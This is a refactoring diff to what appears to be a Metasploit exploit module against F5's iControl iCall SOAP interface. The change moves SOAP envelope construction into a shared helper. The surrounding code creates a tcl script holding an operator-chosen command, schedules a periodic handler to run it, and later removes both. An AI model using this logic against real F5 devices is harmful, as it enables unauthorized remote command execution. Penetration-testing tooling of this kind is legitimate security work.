Simplify XML building

Author: jhart-r7

modules/exploits/linux/http/f5_icall_cmd.rb

@@ -60,6 +60,19 @@ def initialize(info = {})
       ])
   end
 
+  def build_xml
+    builder = Nokogiri::XML::Builder.new do |xml|
+      xml.Envelope do
+        xml = xml_add_namespaces(xml)
+        xml['soapenv'].Header
+        xml['soapenv'].Body do
+          yield xml
+        end
+      end
+    end
+    builder.to_xml
+  end
+
   def xml_add_namespaces(xml)
     ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
     xml.doc.root.namespace = ns
@@ -96,121 +109,85 @@ def send_soap_request(pay)
   # cmd is valid tcl script
   def create_script(cmd)
     scriptname = Rex::Text.rand_text_alpha_lower(5)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-            xml.definitions(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item cmd
-            end
-          end
+    create_xml = build_xml do |xml|
+      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
+        end
+        xml.definitions(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item cmd
         end
       end
     end
-    send_soap_request(builder.to_xml) ? scriptname : false
+    send_soap_request(create_xml) ? scriptname : false
   end
 
   def delete_script(scriptname)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-          end
+    delete_xml = build_xml do |xml|
+      xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
         end
       end
     end
-    send_soap_request(builder.to_xml)
+    send_soap_request(delete_xml)
   end
 
   def script_exists(scriptname)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
-        end
-      end
+    exists_xml = build_xml do |xml|
+      xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
     end
-    res = send_soap_request(builder.to_xml)
+    res = send_soap_request(exists_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
   end
 
   def create_handler(scriptname, interval)
     handler_name = Rex::Text.rand_text_alpha_lower(5)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.handlers(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item handler_name
-            end
-            xml.scripts(string_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item scriptname
-            end
-            long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.intervals(long_attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item interval
-            end
-          end
+    handler_xml = build_xml do |xml|
+      xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.handlers(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
+        end
+        xml.scripts(string_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item scriptname
+        end
+        long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.intervals(long_attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item interval
         end
       end
     end
-    send_soap_request(builder.to_xml) ? handler_name : false
+    send_soap_request(handler_xml) ? handler_name : false
   end
 
   def delete_handler(handler_name)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.handlers(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item handler_name
-            end
-          end
+    delete_xml = build_xml do |xml|
+      xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.handlers(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item handler_name
         end
       end
     end
 
-    send_soap_request(builder.to_xml)
+    send_soap_request(delete_xml)
   end
 
   def handler_exists(handler_name)
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
-        end
-      end
+    handler_xml = build_xml do |xml|
+      xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
     end
-    res = send_soap_request(builder.to_xml)
+    res = send_soap_request(handler_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
   end
 
@@ -220,29 +197,24 @@ def check
     # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
     # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
     # any other response is considered not vulnerable
-    builder = Nokogiri::XML::Builder.new do |xml|
-      xml.Envelope do
-        xml = xml_add_namespaces(xml)
-        xml['soapenv'].Header
-        xml['soapenv'].Body do
-          xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-            attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-            xml.scripts(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item ""
-            end
-            xml.definitions(attrs) do
-              xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-              xml.item ""
-            end
-          end
+    check_xml = build_xml do |xml|
+      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
+        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+        xml.scripts(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item
+        end
+        xml.definitions(attrs) do
+          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
+          xml.item
         end
       end
     end
+
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'data' => builder.to_xml,
+      'data' => check_xml,
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     )